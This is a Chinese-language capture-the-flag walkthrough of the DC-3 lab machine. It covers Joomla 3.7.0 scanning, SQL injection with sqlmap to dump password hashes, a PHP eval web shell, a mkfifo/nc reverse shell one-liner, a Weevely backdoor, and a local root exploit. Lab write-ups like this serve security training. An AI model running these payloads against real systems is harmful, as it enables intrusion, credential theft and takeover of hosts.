0x01 信息收集
DC-3靶机用Vmfusion启动提示需要将磁盘/CD-ROM 从“ide0:1”移到“ide0:0”,windows版本可以直接从高级设置更改,mac版没有这个选项,换用Virtualbox虚拟.提示找不到物理网卡Realtek PCIe FE Family Controller,更改默认网络设置,桥接模式->内部网络,启动成功
首先还是查看攻击机ip,并找到目标机
也可以用netdiscover寻找
netdiscover -r 192.168.5.1/24 //查看子网192.168.5中所有主机
netdiscover是一个更快速,最简单的程序,它不会显示有关目标客户端的非常详细的信息
它只会向我们展示他们的IP地址,MAC地址,有时还会向我们展示硬件制造商
只开放了80端口,访问看看
是一个Joomla站
这次用Nikto扫目录
nikto -h 192.168.5.6
发现后台登录界面
对网站进行指纹识别
whatweb 192.168.5.6
用joomscan扫版本等信息
joomscan -u http://192.168.5.6
0x02 尝试攻击
kali搜索对应版本的漏洞
searchsploit joomla 3.7.0
有一个sql漏洞,保存漏洞信息并查看
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /joomla_sql.txt
使用注入点信息
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
查询当前数据库
--current-db
查当前数据库下的表
-D 'joomladb' --tables
获取#__users中的列名
-D 'joomladb' -T '#__users' --columns
查字段
-D 'joomladb' -T '#__users' -C 'name,password' --dump
把加密的写入文件破解
john 1.txt
登录后台,收集信息
找到可以执行代码的地方
从外部可以访问的位置写入一句话木马,蚁剑连接
<?php @eval($_POST['a']);?>
建立反弹连接,这里使用两种方式
PHP代码反弹shell建立连接,kali监听1337端口,执行文件后没有成功(建立成功后利用py伪终端进一步操作)
nc -lvp 1337 //kali监听1337端口
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.6 1337 >/tmp/f');?>
使用Weevely工具建立
生成服务端
weevely generate <password> <path>
weevely generate 123 shell.php //密码:123456 脚本文件名:shell.php
上传脚本
连接服务端,获得shell
weevely <URL> <password> [cmd]
查看系统信息
uname -a
搜寻对应版本漏洞提权
选一个合适的,放入/root目录下
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root
打开查看漏洞介绍,找到地址下载exp(下载失败/缓慢,换物理机下载),玩成后解压
unzip 39772.zip
进入文件夹,解压脚本tar包,可以使用
tar-xvf exploit.tar //解压exploit提权脚本tar包
蚁剑上传39772.zip到/var/tmp目录下
解压并执行脚本
./compile.sh //执行脚本,编译代码文件
./doubleput //执行提权文件
